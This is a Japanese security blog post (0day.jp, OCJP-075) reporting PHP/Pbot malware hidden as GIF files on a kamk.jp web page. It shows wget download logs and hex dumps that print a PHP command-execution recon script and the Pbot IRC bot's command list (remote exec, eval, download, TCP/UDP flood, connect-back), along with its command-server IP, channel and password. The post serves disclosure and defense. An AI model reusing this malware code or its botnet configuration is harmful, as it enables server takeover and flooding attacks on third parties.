0day.jp (ゼロデイ.JP): #OCJP-075：kamk.jpのウェブページにPHP/Pbotマルウェアを発見！

下記のドメイン/URLにPbotマルウェアを発見しました↓

--20:31:10--  hxxp://comicv.kamk.jp/images/2.gif
           => `2.gif'
Resolving comicv.kamk.jp... 49.212.51.55
Connecting to comicv.kamk.jp|49.212.51.55|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,162 (2.1K) [image/gif]
20:31:10 (70.97 MB/s) - `2.gif' saved [2162/2162]

--20:31:26--  hxxp://comicv.kamk.jp/images/d.gif
           => `d.gif'
Resolving comicv.kamk.jp... 49.212.51.55
Connecting to comicv.kamk.jp|49.212.51.55|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23,145 (23K) [image/gif]
20:31:27 (495.15 KB/s) - `d.gif' saved [23145/23145]

ダウンロードされたのはGIF画像ではなく、PHP/PBOTマルウェアです、証拠↓

$ hexcat ./2.gif

0x0x0000 ＜?php
0x0x0000 ＜?php
0x000007 ##[ Fx29ID ]##
0x000007 ##[ Fx29ID ]##
0x000017 fx("ID","FeeL"."CoMz");
0x000017 fx("ID","FeeL"."CoMz");
0x000030 $P   ＝ @getcwd();
0x000030 $P   ＝ @getcwd();
0x000043 $IP  ＝ @getenv("SERVER_ADDR");
0x000043 $IP  ＝ @getenv("SERVER_ADDR");
0x000063 $UID ＝ fx29exec("id");
0x000063 $UID ＝ fx29exec("id");
0x00007B fx("SAFE",@safemode()?"ON":"OFF");
0x00007B fx("SAFE",@safemode()?"ON":"OFF");
0x00009F fx("OS",@PHP_OS);
0x00009F fx("OS",@PHP_OS);
0x0000B2 fx("UNAME",@php_uname());
0x0000B2 fx("UNAME",@php_uname());
0x0000CD fx("SERVER",($IP)?$IP:"-");
0x0000CD fx("SERVER",($IP)?$IP:"-");
0x0000EA fx("USER",@get_current_user());
0x0000EA fx("USER",@get_current_user());
0x00010B fx("UID",($UID)?$UID:"uid＝".@getmyuid()." gid＝".@getmygid());
0x00010B fx("UID",($UID)?$UID:"uid＝".@getmyuid()." gid＝".@getmygid());
0x00014A fx("DIR",$P);
0x00014A fx("DIR",$P);
0x000159 fx("PERM",(@is_writable($P))?"[W]":"[R]");
0x000159 fx("PERM",(@is_writable($P))?"[W]":"[R]");
0x000185 fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
0x000185 fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
0x0001D4 fx("DISFUNC",@getdisfunc());
0x0001D4 fx("DISFUNC",@getdisfunc());
0x0001F2 ##[ FX29SHEXEC ]##
0x0001F2 ##[ FX29SHEXEC ]##
0x000206 function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "＜br＞"; }
0x000206 function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "＜br＞"; }
0x00025D function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
0x00025D function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
0x0002CB function getdisfunc() { $rez ＝ explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
0x0002CB function getdisfunc() { $rez ＝ explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
0x00033D function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
0x00033D function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
0x0003C1 function fx29exec($cmd) {
0x0003C1 function fx29exec($cmd) {
0x0003DC   if (enabled("exec")) { exec($cmd,$o); $rez ＝ join("\r\n",$o); }
0x0003DC   if (enabled("exec")) { exec($cmd,$o); $rez ＝ join("\r\n",$o); }
0x00041F   elseif (enabled("shell_exec")) { $rez ＝ shell_exec($cmd); }
0x00041F   elseif (enabled("shell_exec")) { $rez ＝ shell_exec($cmd); }
0x00045E   elseif (enabled("system")) { @ob_start(); @system($cmd); $rez ＝ @ob_get_contents(); @ob_end_clean(); }  
0x00045E   elseif (enabled("system")) { @ob_start(); @system($cmd); $rez ＝ @ob_get_contents(); @ob_end_clean(); }  
0x0004CA   elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez ＝ @ob_get_contents(); @ob_end_clean(); }
0x0004CA   elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez ＝ @ob_get_contents(); @ob_end_clean(); }
0x000537   elseif (enabled("popen") && is_resource($h ＝ popen($cmd.' 2＞&1', 'r')) ) { while ( !feof($h) ) { $rez .＝ fread($h, 2096);  } pclose($h); }
0x000537   elseif (enabled("popen") && is_resource($h ＝ popen($cmd.' 2＞&1', 'r')) ) { while ( !feof($h) ) { $rez .＝ fread($h, 2096);  } pclose($h); }
0x0005C5   else { $rez ＝ "Error!"; }
0x0005C5   else { $rez ＝ "Error!"; }
0x0005E2   return $rez;
0x0005E2   return $rez;
0x0005F5 function vsize($size) {
0x0005F5 function vsize($size) {
0x00060E   if (!is_numeric($size)) { return FALSE; }
0x00060E   if (!is_numeric($size)) { return FALSE; }
0x00063B   else {
0x00063B   else {
0x000645     if ( $size ＞＝ 1073741824 ) { $size ＝ round($size/1073741824*100)/100 ." GB"; }
0x000645     if ( $size ＞＝ 1073741824 ) { $size ＝ round($size/1073741824*100)/100 ." GB"; }
0x000699     elseif ( $size ＞＝ 1048576 ) { $size ＝ round($size/1048576*100)/100 ." MB"; }
0x000699     elseif ( $size ＞＝ 1048576 ) { $size ＝ round($size/1048576*100)/100 ." MB"; }
0x0006EB     elseif ( $size ＞＝ 1024 ) { $size ＝ round($size/1024*100)/100 ." KB"; }
0x0006EB     elseif ( $size ＞＝ 1024 ) { $size ＝ round($size/1024*100)/100 ." KB"; }
0x000737     else { $size ＝ $size . " B"; }
0x000737     else { $size ＝ $size . " B"; }
0x00075B     return $size;
0x00075B     return $size;
0x000776 function hdd($type) {
0x000776 function hdd($type) {
0x00078D   $P ＝ @getcwd(); $T ＝ @disk_total_space($P); $F ＝ @disk_free_space($P); $U ＝ $T - $U;
0x00078D   $P ＝ @getcwd(); $T ＝ @disk_total_space($P); $F ＝ @disk_free_space($P); $U ＝ $T - $U;
0x0007E5   $hddspace ＝ array("total" ＝＞ vsize($T), "free"  ＝＞ vsize($F), "used"  ＝＞ vsize($U));
0x0007E5   $hddspace ＝ array("total" ＝＞ vsize($T), "free"  ＝＞ vsize($F), "used"  ＝＞ vsize($U));
0x00083D   return $hddspace[$type];
0x00083D   return $hddspace[$type];
0x00085C die("FeeLCoMz");
0x00085C die("FeeLCoMz");

$ hexcat ./d.gif

0x00000F  *  #crew@RAFFLESIA. since 2008
0x000030  *  edited by: Rio_Saeba ＜czber@yahoo.com＞
0x000060  *  COMMANDS:
0x000073  *  .user ＜password＞ //login to the bot
0x00009C  *  .logout //logout of the bot
0x0000BD  *  .die //kill the bot
0x0000D6  *  .restart //restart the bot
0x0000F6  *  .mail ＜to＞ ＜from＞ ＜subject＞ ＜msg＞ //send an email
0x00012D  *  .dns ＜IP|HOST＞ //dns lookup
0x00014E  *  .download ＜URL＞ ＜filename＞ //download a file
0x000180  *  .exec ＜cmd＞ // uses exec() //execute a command
0x0001B4  *  .sexec ＜cmd＞ // uses shell_exec() //execute a command
0x0001EF  *  .cmd ＜cmd＞ // uses popen() //execute a command
0x000223  *  .info //get system information
0x000247  *  .php ＜php code＞ // uses eval() //execute php code
0x00027E  *  .tcpflood ＜target＞ ＜packets＞ ＜packetsize＞ ＜port＞ ＜delay＞ //tcpflood attack
0x0002CE  *  .udpflood ＜target＞ ＜packets＞ ＜packetsize＞ ＜delay＞ //udpflood attack
0x000317  *  .raw ＜cmd＞ //raw IRC command
0x000339  *  .rndnick //change nickname
0x000359  *  .pscan ＜host＞ ＜port＞ //port scan
0x00037F  *  .safe  // test safe_mode (dvl)
0x0003A3  *  .inbox ＜to＞ // test inbox (dvl)
0x0003C8  *  .conback ＜ip＞ ＜port＞ // conect back (dvl)
0x0003F7  *  .uname // return shell's uname using a php function (dvl)
0x000441 set_time_limit(0); 
0x000456 error_reporting(0); 
0x00046C echo "ok!";
0x00047B class pBot 
0x00048C  var $config ＝ array("server"＝＞"58.225.75.155",
0x0004BD                      "port"＝＞"9999",
0x0004E3                      "pass"＝＞"",
0x000505                      "prefix"＝＞"core",
0x00052D                      "maxrand"＝＞"4",
0x000553                      "chan"＝＞"#rafflesia",
0x00057F                      "chan2"＝＞"#rafflesia",
0x0005AC                      "key"＝＞"",
0x0005CD                      "modes"＝＞"+p",
0x0005F2                      "password"＝＞"almarhum",
0x000620                      "trigger"＝＞".",
0x000646                      "hostauth"＝＞"*" // * for any hostname (remember: /setvhost xdevil.org)

ドメイン情報（連絡先について）

[Domain Name]                   KAMK.JP
[登録者名]                      株式会社インカムス
[Registrant]                    incomes.inc
//onamae.comのお客さんですね。

水曜日, 10月 17, 2012

#OCJP-075：kamk.jpのウェブページにPHP/Pbotマルウェアを発見！

0 件のコメント:

コメントを投稿